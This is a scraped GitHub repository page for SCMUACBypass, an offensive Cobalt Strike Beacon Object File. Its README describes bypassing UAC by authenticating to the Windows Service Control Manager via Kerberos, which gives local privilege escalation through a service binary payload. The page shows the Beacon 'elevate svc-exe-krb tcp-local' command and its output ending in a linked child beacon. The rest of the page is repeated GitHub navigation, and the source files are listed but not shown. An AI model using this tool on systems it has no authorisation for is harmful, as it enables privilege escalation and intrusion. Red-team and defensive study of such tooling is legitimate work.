SCMUACBypass

A BOF which authenticates to the Service Control Manager via Kerberos and LPEs using a service binary payload. This is designed to be used in combination with Kerberos relay attack primitives - the appropriate ticket(s) must already be in your cache.

The included Aggressor script registers a new elevate command in Beacon.

beacon> elevate svc-exe-krb tcp-local

AcquireCredentialsHandleHook called for package Negotiate
Changing to Kerberos package

InitializeSecurityContext called for target HOST/127.0.0.1
InitializeSecurityContext status = 00090312

InitializeSecurityContext called for target HOST/127.0.0.1
InitializeSecurityContext status = 00000000

[+] established link to child beacon: 172.16.0.100

References

https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82

Name		Name	Last commit message	Last commit date
Latest commit History 3 Commits
.gitignore		.gitignore
LICENSE		LICENSE
README.md		README.md
beacon.png		beacon.png
scmuacbypass.cna		scmuacbypass.cna
scmuacbypass.cpp		scmuacbypass.cpp

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

.gitignore

.gitignore

LICENSE

LICENSE

README.md

README.md

beacon.png

beacon.png

scmuacbypass.cna

scmuacbypass.cna

scmuacbypass.cpp

scmuacbypass.cpp

Repository files navigation

SCMUACBypass

References

About

Releases

Packages

Languages

License

rasta-mouse/SCMUACBypass

Folders and files

Latest commit

History

Repository files navigation

SCMUACBypass

References

About

Resources

License

Stars

Watchers

Forks

Languages